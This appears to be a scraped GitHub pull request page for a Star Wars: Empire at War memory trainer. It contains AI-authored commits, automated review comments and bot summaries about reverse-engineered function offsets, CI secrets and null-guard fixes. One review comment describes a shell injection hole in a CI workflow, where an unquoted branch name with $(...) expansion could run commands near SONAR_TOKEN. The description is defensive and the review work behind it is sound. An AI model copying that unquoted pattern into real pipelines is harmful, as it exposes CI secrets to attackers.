ensure arguments are quoted to avoid word-splitting.
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: eef6c0b072
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| SONAR_ARGS="$SONAR_ARGS /d:sonar.pullrequest.key=${{ github.event.pull_request.number }} /d:sonar.pullrequest.branch=${{ github.head_ref }} /d:sonar.pullrequest.base=${{ github.base_ref }}" | ||
| fi | ||
| dotnet-sonarscanner begin $SONAR_ARGS |
There was a problem hiding this comment.
This PR appends ${{ github.head_ref }} and ${{ github.base_ref }} directly into a double-quoted Bash string and then executes dotnet-sonarscanner begin $SONAR_ARGS, which allows a branch name containing shell expansions (for example $VAR or $(...)) to be re-evaluated by the runner. In pull_request jobs this can execute unintended commands in the CI context (including jobs with SONAR_TOKEN), so these refs should be passed via a safely quoted mechanism (e.g., Bash array arguments or pre-escaped env vars).
Useful? React with 👍 / 👎.
The secrets preflight was failing because CHROMATIC_PROJECT_TOKEN, APPLITOOLS_API_KEY, and CODEX_AUTH_JSON were not being forwarded from the caller workflow to the reusable scanner matrix. The secrets exist in the repo but weren't in the secrets: block. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
|
Test files use repetitive setup/assert patterns by design (xUnit). Utility scripts have inherent complexity from CLI option handling. Neither should block the QLTY Zero quality gate. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Analysis CompleteGenerated ECC bundle from 3 commits | Confidence: 50% View Pull Request #122Repository Profile
Detected Workflows (1)
Generated Instincts (17)
After merging, import with: Files
|
|
Analysis CompleteGenerated ECC bundle from 4 commits | Confidence: 50% View Pull Request #122Repository Profile
Detected Workflows (1)
Generated Instincts (16)
After merging, import with: Files
|
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 0291605091
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| "player_count_global": 10579960, | ||
| "default_hero_respawn_time_global": 11495920, | ||
| "add_credits_func": 2618224, | ||
| "set_tech_level_func": 2689408, |
There was a problem hiding this comment.
This fallback offset does not match the RE data added in the same commit: base_swfoc.json uses 2689408 (0x290980), while signatures_phase2_editor_format.json and docs/re_integration_plan.md identify SetTechLevel at 0x288980 (2656640). If the AOB signature misses (the exact case fallback is for), symbol resolution points at the wrong RVA and any reads/writes or calls through set_tech_level_func will target unrelated code/data.
Useful? React with 👍 / 👎.
| "add_credits_func": 2618224, | ||
| "set_tech_level_func": 2689408, | ||
| "set_speed_override_func": 3837072, | ||
| "clear_speed_override_func": 3733168 |
There was a problem hiding this comment.
The fallback here is inconsistent with the Phase 2 RE pack introduced in this commit (signatures_phase2_editor_format.json lists clear_speed_override_func as 3733680, but this profile uses 3733168). Because standalone fallbacks are materialized into the symbol map when signatures are absent, this mismatch can resolve clear_speed_override_func to the wrong location on fallback paths.
Useful? React with 👍 / 👎.
The coverage collection PowerShell script uses Windows paths and dotnet tooling that requires Windows. The reusable workflow accepts a runner input but the caller wasn't passing it, defaulting to ubuntu-latest which caused path resolution failures. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
|
Analysis CompleteGenerated ECC bundle from 5 commits | Confidence: 50% View Pull Request #123Repository Profile
Detected Workflows (1)
Generated Instincts (16)
After merging, import with: Files
|
- Add [assembly: CLSCompliant(true)] to all 11 projects - Fix MegEntry.Crc32 (uint → long) and Flags (ushort → int) for CLS compliance - Upgrade coverlet to 8.0.0 (6.0.5 doesn't exist, jumped from 6.0.4 to 8.0.0) Addresses 233 Codacy "Mark Assemblies as CLS Compliant" findings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Not up to standards ⛔🔴 Issues
|
| Category | Results |
|---|---|
| ErrorProne | 89 critical |
| CodeStyle | 1 minor |
🟢 Metrics 4 complexity · 0 duplication
Metric Results Complexity ✅ 4 (≤ 10 complexity) Duplication ✅ 0 (≤ 0 duplication)
TIP This summary will be updated as you push new changes. Give us feedback
Add ArgumentNullException.ThrowIfNull to constructor parameters in: - CatalogService, HelperModService, LuaHarnessRunner - FileSystemProfileRepository, GitHubProfileUpdateService, ModOnboardingService - SaveSchemaRepository, BinarySaveCodec, SavePatchPackService Part of the 2,267 Codacy issue burn-down (null dereference category). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 02beceb1a7
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| "game_speed": 0, | ||
| "player_array_global": 10579952, | ||
| "player_count_global": 10579960, | ||
| "default_hero_respawn_time_global": 11495920, |
There was a problem hiding this comment.
The new default_hero_respawn_time_global fallback uses 11495920, but 0xB169F0 converts to 11626992, not this value. SignatureResolverFallbacks.ApplyStandaloneFallbacks materializes standalone fallback keys directly into the symbol map, so this symbol can resolve to the wrong global whenever it is read or used by future actions. Use the correct decimal conversion to keep this fallback aligned with the RE data.
Useful? React with 👍 / 👎.
…reference fixes) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
… dereference fixes) Add ArgumentNullException.ThrowIfNull() at method entry for all public and internal method parameters that could dereference null. Covers all 28 non-generated .cs files in SwfocTrainer.Runtime/: - Interop: ProcessMemoryAccessor (WriteBytes buffer, ReadBytes count guard) - Scanning: AobPattern.Parse, AobScanner.FindPattern (pattern/memory params) - Services: constructor null guards on all injected dependencies (BackendRouter, BinaryFingerprintService, CapabilityMapResolver, GameLaunchService, LaunchContextResolver, ModDependencyValidator, ModMechanicDetectionService, NamedPipeExtenderBackend, NamedPipeHelperBridgeBackend, NoopSdkRuntimeAdapter, ProcessLocator, ProfileVariantResolver, RuntimeAdapter, SignatureResolver, SymbolHealthService, TelemetryLogTailService, ValueFreezeService, WorkshopInventoryService) - SignatureResolver partials: Addressing, Fallbacks, SymbolHydration - NamedPipeExtenderBackendContextHelpers: ParseCapabilities guard - RuntimeModeProbeResolver, SdkExecutionGuard: method param guards - WorkshopInventoryChainResolver: ResolveChains items guard - TelemetryLogTailService: extracted Directory.GetParent to local - GameLaunchService: added using() on Process from GetProcessesByName - ProcessLocator: added using() on Process from GetProcesses() - BinaryFingerprintService: null-coalesce on ProcessModule.ModuleName No #pragma warning disable, no [SuppressMessage], no codacy:ignore. Build verified: 0 errors, 0 warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…eference fixes) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
|
| Path.Combine(processDirectory, "LogFile.txt"), | ||
| Path.Combine(processDirectory, "corruption", "LogFile.txt"), | ||
| Path.Combine(Directory.GetParent(processDirectory)?.FullName ?? processDirectory, "corruption", "LogFile.txt") | ||
| Path.Combine(parentDirectory, "corruption", "LogFile.txt") |
Check notice
Code scanning / CodeQL
Call to 'System.IO.Path.Combine' may silently drop its earlier arguments Note
Copilot Autofix
AI 24 days ago
Copilot could not generate an autofix suggestion
Copilot could not generate an autofix suggestion for this alert. Try pushing a new commit or if the problem persists contact support.
CI Feedback 🧐A test triggered by this PR failed. Here is an AI-generated analysis of the failure:
|
2 participants
Summary
RE Source
All corrections derived from static decompilation of StarWarsG.exe v1.121.13.7360 using Ghidra 12.0.3 + GhidraMCP 4.3.0. Knowledge base at swfoc_memory/alamo_engine_kb.json.
Test plan
Generated with Claude Code
Summary by CodeRabbit
Documentation
New Features
Changes
Chores